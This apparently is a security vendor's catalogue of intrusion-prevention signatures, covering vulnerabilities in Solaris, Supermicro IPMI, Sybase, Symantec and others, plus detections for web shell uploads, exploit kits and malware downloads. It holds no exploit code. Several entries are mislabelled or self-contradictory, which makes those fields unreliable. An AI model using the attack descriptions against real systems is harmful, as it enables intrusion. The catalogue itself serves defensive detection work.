http://www.securityfocus.com/bid/3274

OSVDB-15131
http://www.osvdb.org/15131

Sun-Solaris-Rwhod-Buffer-Overflow

About this vulnerability:

A vulnerability in Sun Solaris

Risk:

High

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris

Software:

<os>

Type:

Buffer Overflow

Description:

A vulnerability exists within the in.rwhod daemon component of Sun Solaris. The daemon can potentially be exploited from a remote host to be compromised for code injection and execution. This vulnerability may allow an attacker to execute arbitrary code on the vulnerable host within the security context of the root user.

Situation:

Generic_UDP-Sun-Solaris-Rwhod-Buffer-Overflow

References:

CVE-2004-1351
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1351

BID-11840
http://www.securityfocus.com/bid/11840

Sun-Solaris-sadmind-RPC-Request-Buffer-Overflow

About this vulnerability:

A vulnerability in Sun Microsystems Solaris

Risk:

Moderate

First detected in:

sgpkg-ips-389-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris

Software:

<os>

Type:

Buffer Overflow

Description:

A heap-based buffer overflow vulnerability exists in the sadmind service within the Sun Solaris operating system. The vulnerability is due to an input validation error when allocating a heap buffer while parsing specially crafted RPC requests. A remote unauthenticated attacker can leverage this vulnerability by sending a crafted RPC message to the target host, to potentially inject and execute arbitrary code with root level privileges. In a sophisticated attack case where code injection and execution is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service, normally root. In case if the code execution is not achieved, the sadmind service will be terminated abnormally.

Situation:

Generic_UDP-Sun-Solaris-sadmind-RPC-Request-Buffer-Overflow
SunRPC_CS-Sun-Solaris-sadmind-RPC-Request-Buffer-Overflow

References:

CVE-2008-3869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3869

BID-35083
http://www.securityfocus.com/bid/35083

OSVDB-54663
http://www.osvdb.org/54663

Sun-Solaris-sadmind-RPC-Request-Integer-Overflow

About this vulnerability:

Sun Solaris sadmind RPC Request Integer Overflow

Risk:

High

First detected in:

sgpkg-ips-224-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris 8; Solaris 9

Software:

RPC

Type:

Buffer Overflow

Description:

An integer overflow vulnerability exists in the sadmind service within the Sun Solaris operating system. The vulnerability resides in the calculation of a buffer allocation size while parsing specially crafted RPC requests. A remote unauthenticated attacker can leverage this vulnerability by sending a crafted RPC message to the target host, to potentially inject and execute arbitrary code with root level privileges. In a sophisticated attack case where code injection and execution is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service, normally root. In case if the code execution is not achieved, the sadmind service will be terminated abnormally. Varous XDR implementations (SunRPC, libnsl, libc, glibc, etc..) are vulnerable to a buffer overflow condition, which can be exploited by an attacker to cause denial of service or to execute arbitrary commands on the system.

Situation:

Generic_RPC-sadmind-RPC-Request-Integer-Overflow

References:

CVE-2008-3870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3870

BID-35083
http://www.securityfocus.com/bid/35083

OSVDB-54668
http://www.osvdb.org/54668

Sun-Solaris-sadmind-RPC-Request-Integer-Overflow-CVE-2008-3870

About this vulnerability:

A vulnerability in Sun Microsystems Solaris

Risk:

Moderate

First detected in:

sgpkg-ips-384-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris

Software:

RPC

Type:

Integer Overflow

Description:

Situation:

Generic_UDP-Sun-Solaris-sadmind-RPC-Request-Integer-Overflow-CVE-2008-3870

References:

CVE-2008-3870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3870

BID-35083
http://www.securityfocus.com/bid/35083

OSVDB-54668
http://www.osvdb.org/54668

Sundown-Malware

About this vulnerability:	Sundown malware
Risk:	High
First detected in:	sgpkg-ips-793-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Sundown is an exploit kit.
Situation:	HTTP_CSU-Sundown-Malware-Activity HTTP_SHS-Sundown-Malware-Activity

Sunhillo-Sureline-Command-Injection-CVE-2021-36380

About this vulnerability:

A vulnerability in Sunhillo SureLine

Risk:

High

First detected in:

sgpkg-ips-1641-5242

Last changed:

sgpkg-ips-1641-5242

Platform:

Generic

Software:

SureLine

Type:

Input Validation

Description:

An unauthenticated command injection vulnerability has been reported in Sunhillo SureLine versions before 8.7.0.1.1.

Situation:

HTTP_CRL-Sunhillo-Sureline-Command-Injection-CVE-2021-36380

References:

CVE-2021-36380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36380

SunRPC-Xdr-Xdrmem-Getbytes-Integer-Overflow

About this vulnerability:

Buffer overflow in various XDR implementations

Risk:

Critical

First detected in:

sgpkg-ips-478-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

<os>

Type:

Buffer Overflow

Description:

Varous XDR implementations, for example SunRPC, libnsl, libc, and glibc, are vulnerable to a buffer overflow condition, which can be exploited by an attacker to cause denial of service or to execute arbitrary commands on the system.

Situation:

Generic_UDP-SunRPC-Xdr-Xdrmem-Getbytes-Integer-Overflow

References:

CVE-2003-0028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0028

BID-7123
http://www.securityfocus.com/bid/7123

Sunway-ForceControl-Denial-Of-Service-Vulnerability

About this vulnerability:

A vulnerability in Sunway ForceControl

Risk:

Moderate

First detected in:

sgpkg-ips-610-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sunway ForceControl

Type:

Buffer Overflow

Description:

There is a vulnerability in Sunway ForceControl which may allow an attacker to reboot the system by sending crafted tcp packets.

Situation:

Generic_CS-Sunway-ForceControl-Denial-Of-Service-Vulnerability

References:

OSVDB-75800
http://www.osvdb.org/75800

Sunway-ForceControl-SCADA-Login-Method-ActiveX-Buffer-Overflow-Vulnerability

About this vulnerability:

A vulnerability in Sunway Forcecontrol

Risk:

Moderate

First detected in:

sgpkg-ips-568-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sunway ForceControl

Type:

Buffer Overflow

Description:

There is a vulnerability in CellCtrl caused due to a boundary error in the "Login()" method of the Read & Write Excel ActiveX control (RWXls.RWXlsCtrl.2).

Situation:

File-Text_Sunway-ForceControl-SCADA-Login-Method-ActiveX-Buffer-Overflow-Vulnerability

References:

BID-49747
http://www.securityfocus.com/bid/49747

OSVDB-75683
http://www.osvdb.org/75683

Sunway-ForceControl-SNMP-Netdbserver-Integer-Signedness-Buffer-Overflow

About this vulnerability:	A vulnerability in Sunway ForceControl
Risk:	Moderate
First detected in:	sgpkg-ips-415-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Sunway ForceControl
Type:	Buffer Overflow
Description:	A stack buffer overflow vulnerability has been reported in Sunway ForceControl. The vulnerability is due to an integer signedness error. A remote attacker can exploit this vulnerability by sending a crafted request to the target service. A successful attack would result in the injection and execution of arbitrary attacker code. If the attack fails, the service may terminate abnormally.
Situation:	Generic_CS-Sunway-ForceControl-Netdbserver-Integer-Signedness-Buffer-Overflow

Sunway-ForceControl-SNMP-Netdbserver-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Sunway ForceControl
Risk:	Moderate
First detected in:	sgpkg-ips-416-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Sunway ForceControl
Type:	Buffer Overflow
Description:	A stack buffer overflow vulnerability has been reported in Sunway ForceControl. The vulnerability is due to a lack of bounds checking. A remote attacker can exploit this vulnerability by sending a crafted request to the target service. A successful attack would result in the injection and execution of arbitrary attacker code. If the attack fails, the service may terminate abnormally.
Situation:	Generic_CS-Sunway-ForceControl-SNMP-Netdbserver-Stack-Buffer-Overflow

Superfish-TLS-Certificate

About this vulnerability:	TLS Certificate referencing Superfish
Risk:	Moderate
First detected in:	sgpkg-ips-630-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Superfish is a cloud based image analyzing software which installs a 3rd party root certificate to the running computer. As the program also contains the private key generating valid certificates, an attacker may use it to generate system accepted forged signatures for man in the middle attacks or forced system updates.
Situation:	HTTPS_SS-Superfish-TLS-Certificate

Supermicro-IPMI-Static-SSL-Certificate

About this vulnerability:

A Supermicro IPMI Static SSL Certificate vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-765-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Supermicro Onboard IPMI

Type:

Insecure Configuration

Description:

A vulnerability in Supermicro Onboard IPMI, firmware version SMT_X9_214, which allows remote attackers to perform a man-in-the-middle attack, and to decrypt all communication to the controller.

Situation:

TLS_SS-Supermicro-IPMI-Static-SSL-Certificate

References:

CVE-2013-3619
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3619

Supermicro-Onboard-IPMI-Close-Window-Cgi-Buffer-Overflow

About this vulnerability:

Supermicro Onboard IPMI close window cgi Buffer Overflow

Risk:

Moderate

First detected in:

sgpkg-ips-574-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Supermicro Onboard IPMI

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Supermicro Onboard IPMI allowing remote attackers to execute arbitrary code.

Situation:

HTTP_CRL-Supermicro-Onboard-IPMI-Close-Window-Cgi-Buffer-Overflow

References:

CVE-2013-3623
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3623

OSVDB-99598
http://www.osvdb.org/99598

Supermicro-Onboard-IPMI-login.cgi-Multiple-Buffer-Overflows

About this vulnerability:

A vulnerability in Supermicro Onboard IPMI

Risk:

High

First detected in:

sgpkg-ips-597-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Supermicro Onboard IPMI

Type:

Buffer Overflow

Description:

There are two buffer overflow vulnerabilities in Supermicro Onboard IPMI. The vulnerabilities are due to missing length checks when reading the values of name and pwd parameters.

Situation:

HTTP_CRL-Supermicro-Onboard-IPMI-login.cgi-Multiple-Buffer-Overflows

References:

CVE-2013-3621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3621

Supermicro-Onboard-IPMI-logout.cgi-Buffer-Overflow

About this vulnerability:

A vulnerability in Supermicro Onboard IPMI

Risk:

High

First detected in:

sgpkg-ips-597-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Supermicro Onboard IPMI

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Supermicro Onboard IPMI. The vulnerability are due to a missing length check when reading the value of SID parameter passed to logout.cgi.

Situation:

HTTP_CRL-Supermicro-Onboard-IPMI-logout.cgi-Buffer-Overflow

References:

CVE-2013-3622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3622

Supermicro-Onboard-IPMI-url_redirect.cgi-Directory-Traversal

About this vulnerability:	A vulnerability in Supermicro Onboard IPMI
Risk:	High
First detected in:	sgpkg-ips-597-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	Supermicro Onboard IPMI
Type:	Buffer Overflow
Description:	There is a directory traversal vulnerability in Supermicro Onboard IPMI. The vulnerability is due to lack of sanitization of the url_name parameter passed to url_redirect.cgi.
Situation:	HTTP_CRL-Supermicro-Onboard-IPMI-url_redirect.cgi-Directory-Traversal

Supervene-RazDC-Create-User-Code-Injection

About this vulnerability:

A vulnerability in Supervene RazDC

Risk:

High

First detected in:

sgpkg-ips-1323-5242

Last changed:

sgpkg-ips-1323-5242

Platform:

Generic

Software:

Supervene RazDC

Type:

Input Validation

Description:

There exists a vulnerability in Supervene RazDC which allows remote attackers to execute arbitrary code due to the lack of input validation to the password parameter to create_user.cgi.

Situation:

HTTP_CS-Supervene-RazDC-Create-User-Code-Injection

References:

CVE-2018-15551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15551

Supervene-RazDC-Reset-Password-Code-Injection

About this vulnerability:

A vulnerability in Supervene RazDC

Risk:

High

First detected in:

sgpkg-ips-1323-5242

Last changed:

sgpkg-ips-1323-5242

Platform:

Generic

Software:

Supervene RazDC

Type:

Input Validation

Description:

There exists a vulnerability in Supervene RazDC which allows remote attackers to execute arbitrary code due to the lack of input validation to the password parameter to save_passwd.cgi.

Situation:

HTTP_CS-Supervene-RazDC-Reset-Password-Code-Injection

References:

CVE-2018-15549
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15549

Supervisor-XML-RPC-Authenticated-Remote-Code-Execution

About this vulnerability:

A Supervisor XML-RPC Authenticated Remote Code Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-1020-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; Unix; Mac OS X

Software:

Supervisor

Type:

Input Validation

Description:

A vulnerability in Supervisor XML-RPC, versions 3.0a1 to 3.3.2, which allows remote attackers to execute arbitrary code via a malicious XML-RPC request.

Situation:

HTTP_CRL-Supervisor-XML-RPC-Authenticated-Remote-Code-Execution

References:

CVE-2017-11610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610

Support-Incident-Tracker-Remote-Command-Execution

About this vulnerability:

A Support Incident Tracker Remote Command Execution vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-789-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Support Incident Tracker

Type:

Insecure Configuration

Description:

A vulnerability in the Support Incident Tracker, version 3.65, in ftp_upload_file.php, which allows remote attackers to obtain sensitive information via the file name which reveals the installation path in an error message.

Situation:

HTTP_CS-Support-Incident-Tracker-Remote-Command-Execution

References:

CVE-2011-3829
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3829

OSVDB-76999
http://www.osvdb.org/76999

Supra-Smart-Cloud-TV-Remote-File-Inclusion

About this vulnerability:

A vulnerability in Supra Smart Cloud TV

Risk:

Low

First detected in:

sgpkg-ips-1194-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Supra Smart Cloud TV

Type:

Insecure Configuration

Description:

A vulnerability in Supra Smart Cloud TV which allows remote attackers to send a crafted request and broadcast a fake video due to the lack of sesion management and authentication.

Situation:

HTTP_CSU-Supra-Smart-Cloud-TV-Remote-File-Inclusion

References:

CVE-2019-12477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12477

Suprema-Biostar-2-SQL-Injection-CVE-2023-27167

About this vulnerability:

A vulnerability in Suprema BioStar 2

Risk:

High

First detected in:

sgpkg-ips-1657-5242

Last changed:

sgpkg-ips-1657-5242

Platform:

Generic

Software:

Suprema BioStar 2

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Suprema BioStar 2 version 2.8.16.

Situation:

HTTP_CRL-Suprema-Biostar-2-SQL-Injection-CVE-2023-27167

References:

CVE-2023-27167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27167

Suspected_Website_Defacement

About this vulnerability:	A suspected website defacement was detected
Risk:	Moderate
First detected in:	sgpkg-ips-1228-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	Suspected website defacement was detected. A website defacement is an attack against a website to change the visual content on it. The content on the website can also be malicious.
Situation:	File-Text_Suspected_Website_Defacement

Suspicious-ASPX-File-Upload

About this vulnerability:	A suspicious ASPX file upload
Risk:	High
First detected in:	sgpkg-ips-1755-5242
Last changed:	sgpkg-ips-1755-5242
Platform:	Any Operating System
Software:	Any Software
Type:	Code Injection
Description:	ASPX file upload with suspicious contents was detected. This can indicate an attempt to place a web shell on the server.
Situation:	File-Text_Suspicious-ASPX-File-Content-Upload File-TextId_Suspicious-ASPX-File-Content-Upload

Suspicious-Decimal-Content

About this vulnerability:	Suspicious decimal content was detected
Risk:	High
First detected in:	sgpkg-ips-1361-5242
Last changed:	sgpkg-ips-1361-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Suspicious decimal content was detected.
Situation:	File-Text_Suspicious-Decimal-Content

Suspicious-ELF-File-Download

About this vulnerability:	An attempt to download a suspicious ELF file detected
Risk:	High
First detected in:	sgpkg-ips-1413-5242
Last changed:	sgpkg-ips-1413-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	An attempt to download a suspicious ELF file detected.
Situation:	File-Exe_Suspicious-ELF-File-Download

Suspicious-Executable-Download

About this vulnerability:	Suspicious executable download detected
Risk:	High
First detected in:	sgpkg-ips-1202-5242
Last changed:	sgpkg-ips-1405-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Suspicious download of an executable file from Wordpress platform was detected. Malicious actors (ex. Emotet) have been confirmed to use hacked Wordpress sites to delivery their malicious programs.
Situation:	File-Exe_Suspicious-Executable-Download

Suspicious-Executable-Filename

About this vulnerability:	An executable with suspicious name detected
Risk:	Low
First detected in:	sgpkg-ips-805-5242
Last changed:	sgpkg-ips-1860-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	A suspiciously named executable file.
Situation:	File-Name_Suspicious-Executable-Filename

Suspicious-Filename

About this vulnerability:	An information disclosure vulnerability
Risk:	High
First detected in:	sgpkg-ips-350-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	Generic FTP server
Type:	Insecure Configuration
Description:	An insecure configuration may expose server to an information disclosure exploits.
Situation:	FTP_CS-Suspicious-Filename

Suspicious-IPP-Request-CVE-2024-47176

About this vulnerability:

An attempt to exploit a vulnerability in cups-browsed detected

Risk:

High

First detected in:

sgpkg-ips-1786-5242

Last changed:

sgpkg-ips-1791-5242

Platform:

Generic

Software:

cups-browsed

Type:

Input Validation

Description:

CUPS is a standards-based, open-source printing system, and the cups-browsed service contains network printing functionality including auto-discovering print services and shared printers. The service binds to "INADDR_ANY:631", causing it to trust any packet from any source. As a result, multiple bugs in "cups-browsed" can be exploited in sequence to introduce a malicious printer to the system, including CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177.

Situation:

Generic_UDP-Suspicious-IPP-Request-CVE-2024-47176
File-Binary_CUPS-Remote-Command-Execution-Via-FoomaticRIPCommandLine-CVE-2024-47177
File-Binary_CUPS-Command-Injection-CVE-2024-47176

References:

CVE-2024-47176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47176

Suspicious-Jsp-File-Upload

About this vulnerability:	A suspicious JSP file upload
Risk:	High
First detected in:	sgpkg-ips-1527-5242
Last changed:	sgpkg-ips-1667-5242
Platform:	Any Operating System
Software:	Any Software
Type:	Code Injection
Description:	An upload of a JSP file with path traversal characters in the file name or URL parameters was detected. This can indicate an attempt to place a web shell on the server.
Situation:	File-Text_Suspicious-Jsp-File-Upload File-Text_Suspicious-Jsp-File-Content-Upload File-TextId_Suspicious-Jsp-File-Upload

Suspicious-MSDT-URI-Scheme-In-HTML

About this vulnerability:

A suspicious MSDT URI Scheme in HTML

Risk:

High

First detected in:

sgpkg-ips-1472-5242

Last changed:

sgpkg-ips-1495-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

A remote code execution vulnerability CVE-2022-30190 has been reported in Microsoft Office. This situation detects suspicious HTML files that contain a MSDT URI scheme associated with this vulnerability.

Situation:

File-Text_Suspicious-MSDT-URI-Scheme-In-HTML

References:

CVE-2022-30190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190

Suspicious-Multiline-HTTP-Header

About this vulnerability:	Multi-line HTTP server header
Risk:	Low
First detected in:	sgpkg-ips-783-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	Suspicious multiline entries detected in HTTP server header field. Often this means odd server configuration, but sometimes it can be used to evade http packet inspection.
Situation:	HTTP_SHS-Suspicious-Multiline-HTTP-Header

Suspicious-Server-Name-Indication

About this vulnerability:	Suspicious looking Server Name Indication field
Risk:	Low
First detected in:	sgpkg-ips-779-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Browser
Description:	A suspicious pattern in TLS handshake Server Name Indication -extension. (E.g. www.62vikz6k4gjkk2hzjytan2x3.com) This is often related to spoofed TLS server names in tunneling protocols such as Tor.
Situation:	TLS-SNI_Suspicious-Server-Name-Indication

Suspicious-SettingContent-MS-File

About this vulnerability:

A suspicious settingcontent-ms file detected

Risk:

Moderate

First detected in:

sgpkg-ips-1089-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There has been reported a an issue with safe file formats which can be abused to achieve remote code execution on Windows operation system.

Situation:

File-TextId_Suspicious-SettingContent-MS-File

References:

CVE-2018-8414
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8414

ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug

Suspicious-User-Agent-WinHTTP-Loader

About this vulnerability:	Suspicious user-agent WinHTTP loader was detected
Risk:	High
First detected in:	sgpkg-ips-1202-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Suspicious user-agent string WinHTTP loader was detected. This user-agent has been used by malware (ex. Trickbot). In some cases, this situation might cause false-positives.
Situation:	HTTP_CSH-Suspicious-User-Agent-WinHTTP-Loader

Suspicious-WebDav-Request-To-Known-TCP-Tunneling-Services

About this vulnerability:	A suspicious WebDAV request detected
Risk:	High
First detected in:	sgpkg-ips-1832-5242
Last changed:	sgpkg-ips-1832-5242
Platform:	Windows
Software:	Any Software
Type:	Backdoor
Description:	This fingerprint detects WebDAV requests to public TCP tunneling services, such as trycloudflare.com. Such activities are usually performed by malware to stealthily access exploit files hosted on legitimate services.
Situation:	HTTP_CSH-Suspicious-WebDav-Request-To-Known-TCP-Tunneling-Services

Suspicious-Windows-Script-Retrieval-Via-WebDav

About this vulnerability:	A suspicious Windows script file retrieval detected
Risk:	High
First detected in:	sgpkg-ips-1832-5242
Last changed:	sgpkg-ips-1832-5242
Platform:	Windows
Software:	Any Software
Type:	Backdoor
Description:	This fingerprint detects the retrieval of Windows script files over WebDAV. Such activities are usually performed by malware to stealthily access exploit files hosted on legitimate services.
Situation:	HTTP_CSU-Suspicious-Windows-Script-File-Retrieval-Via-WebDav

Suspiciously-Large-Windows-Script-File

About this vulnerability:	A transfer of a suspiciously large Windows script file detected
Risk:	High
First detected in:	sgpkg-ips-1863-5242
Last changed:	sgpkg-ips-1863-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	A common strategy to distribute malware onto victims' computers is to embed the malware executable inside a VBScript or Batch script, which extracts and drops the executable when being executed. These dropper scripts are usually larger than usual (e.g., few megabytes).
Situation:	File-Text_Suspiciously-Large-Windows-Script-File File-Binary_Suspiciously-Large-Windows-Script-File

SVN-Subversion-Apr-Time-T-System-Compromise

About this vulnerability:

Buffer overflow in Subversion's apr_time_t data conversion

Risk:

High

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1761-5242

Platform:

Generic

Software:

Subversion

Type:

Buffer Overflow

Description:

Subversion suffers from a buffer overflow vulnerability in a function that converts date strings. Remote attackers can exploit the vulnerability by sending a crafted DAV2 REPORT query or a get-dated-rev request, which causes a stack-based buffer overflow and allows arbitrary code execution.

Situation:

HTTP_CS-Subversion-Apr-Time-T-System-Compromise
SVN_Subversion-Apr-Time-T-System-Compromise

References:

CVE-2004-0397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0397

BID-10386
http://www.securityfocus.com/bid/10386

OSVDB-6301
http://www.osvdb.org/6301

SVN_Subversion-String-Parsing

About this vulnerability:

A vulnerability in Subversion

Risk:

High

First detected in:

sgpkg-ips-420-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Subversion

Type:

Buffer Overflow

Description:

There is a vulnerability in the way Subversion handles svn protocol requests. A specially crafted svn request could cause svnserve, the daemon that handles svn protocol requests, to allocate insufficient heap memory and overflow the heap. It is possible for a malicious attacker to run arbitrary code on the Subversion server with the privilege of the account that runs svnserve daemon.

Situation:

SVN_Subversion-String-Parsing

References:

CVE-2004-0413
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0413

BID-10519
http://www.securityfocus.com/bid/10519

Sybase-EAServer-Directory-Traversal

About this vulnerability:

A Sybase EAServer Directory Traversal vulnerability.

Risk:

High

First detected in:

sgpkg-ips-715-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sybase Enterprise Application Server

Type:

Directory Traversal

Description:

A vulnerability in Sybase EAServer 6.3.1 Developer Edition which allows remote attackers to read arbitrary files via a directory traversal.

Situation:

HTTP_CSU-Apache-Backslash-Directory-Traversal

References:

CVE-2011-2474
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2474

OSVDB-72498
http://www.osvdb.org/72498

Sybase-M-Business-Anywhere-agSoap.exe-BOF

About this vulnerability:

A vulnerability in Apple Computer Common UNIX Printing System (CUPS)

Risk:

Moderate

First detected in:

sgpkg-ips-391-4219

Last changed:

sgpkg-ips-1588-5242

Platform:

Windows

Software:

Sybase M-Business Anywhere

Type:

Malfunction

Description:

A heap buffer overflow vulnerability exists in Sybase M-Business Anywhere. The vulnerability is due to a boundary error while agSoap.exe processes closing tags for XML entities in a SOAP request.

Situation:

HTTP_CS-Sybase-M-Business-Anywhere-agSoap.exe-BOF

References:

BID-47775
http://www.securityfocus.com/bid/47775

Sybase-Open-Server-Function-Pointer-Array-Code-Execution

About this vulnerability:

A vulnerability in Sybase OpenServer

Risk:

High

First detected in:

sgpkg-ips-408-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sybase Open Server

Type:

Malfunction

Description:

A code execution vulnerability exists in Sybase Open Server. The vulnerability is due to an error in the processing of malformed login packets by the Backup Server (bcksrvr.exe) and Monitor Server (monsrvr.exe) components. Maliciously crafted packets could cause the service to call a function pointer from an attacker-controlled location. Successful exploitation of this vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code on the target system in the context of the affected service, which is SYSTEM.

Situation:

Generic_CS-Sybase-Open-Server-Function-Pointer-Array-Code-Execution

References:

BID-48934
http://www.securityfocus.com/bid/48934

OSVDB-74154
http://www.osvdb.org/74154

Sybase-Open-Server-Null-Byte-Stack-Memory-Corruption

About this vulnerability:

A vulnerability in Sybase Open Server

Risk:

High

First detected in:

sgpkg-ips-408-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sybase Open Server

Type:

Malfunction

Description:

A code execution vulnerability exists in Sybase Open Server. The vulnerability is due to an error in the processing of malformed login packets by the Backup Server (bcksrvr.exe) and Monitor Server (monsrvr.exe) components. Maliciously crafted packets can cause a single NULL byte to be written to an attacker-controlled location on the stack. Successful exploitation of this vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code on the target system in the context of the affected service, which is SYSTEM.

Situation:

Generic_CS-Sybase-Open-Server-Null-Byte-Stack-Memory-Corruption

References:

OSVDB-74155
http://www.osvdb.org/74155

Sybase-SQL-Anywhere-Mobilink-Crafted-Strings-Buffer-Overflow

About this vulnerability:

A vulnerability in Sybase MobiLink

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sybase MobiLink; Sybase SQL Anywhere Studio

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the MobiLink component of Sybase SQL Anywhere.

Situation:

Generic_CS-Sybase-SQL-Anywhere-Mobilink-Crafted-Strings-Buffer-Overflow

References:

BID-27914
http://www.securityfocus.com/bid/27914

Symantec-Alert-Management-System-Amssendalertack-Buffer-Overflow

About this vulnerability:

A vulnerability in Symantec Antivirus Corporate Edition

Risk:

High

First detected in:

sgpkg-ips-375-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Antivirus Corporate Edition; Symantec Quarantine Server; Symantec Systems Center

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Symantec Intel Alert Management System. The vulnerability is caused by code which copies a user supplied string into a stack buffer without proper bounds checks. The vulnerable code (contained in AMSLIB.dll) handles data sent to the msgsys.exe process which listens on port TCP/38292 by default. A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted packet to the affected service. Successful exploitation could result in arbitrary code execution in the SYSTEM context.

Situation:

Generic_CS-Symantec-Alert-Management-System-Amssendalertack-Buffer-Overflow

References:

CVE-2010-0110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0110

BID-45936
http://www.securityfocus.com/bid/45936

Symantec-Alert-Management-System-Arbitrary-Program-Execution

About this vulnerability:

Symantec Alert Management System Intel File Transfer Service Arbitrary Program Execution

Risk:

High

First detected in:

sgpkg-ips-220-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Symantec Alert Management System; Symantec Antivirus Corporate Edition; Symantec Endpoint Protection

Type:

Buffer Overflow

Description:

A design error exists in Symantec Alert Management System Console component shipped with Symantec software. The vulnerability is due to a design error in XFR.EXE while transferring files to AMS2. This can be exploited by remote unauthenticated attackers to execute arbitrary code on the target host. Successful exploitation will lead to arbitrary files being executed within the context of System on the Windows platform. The behaviour of the target is entirely dependent on the code executed.

Situation:

Generic_Symantec-Alert-Management-Arbitrary-Program-Execution

References:

CVE-2009-1431
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1431

BID-34675
http://www.securityfocus.com/bid/34675

Symantec-Alert-Management-System-HNDLRSVC-Command-Execution

About this vulnerability:

A command execution vulnerability in Symantec Alert Management System service

Risk:

Critical

First detected in:

sgpkg-ips-373-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Symantec Client Security; Symantec Antivirus Corporate Edition; Symantec System Center

Type:

Malfunction

Description:

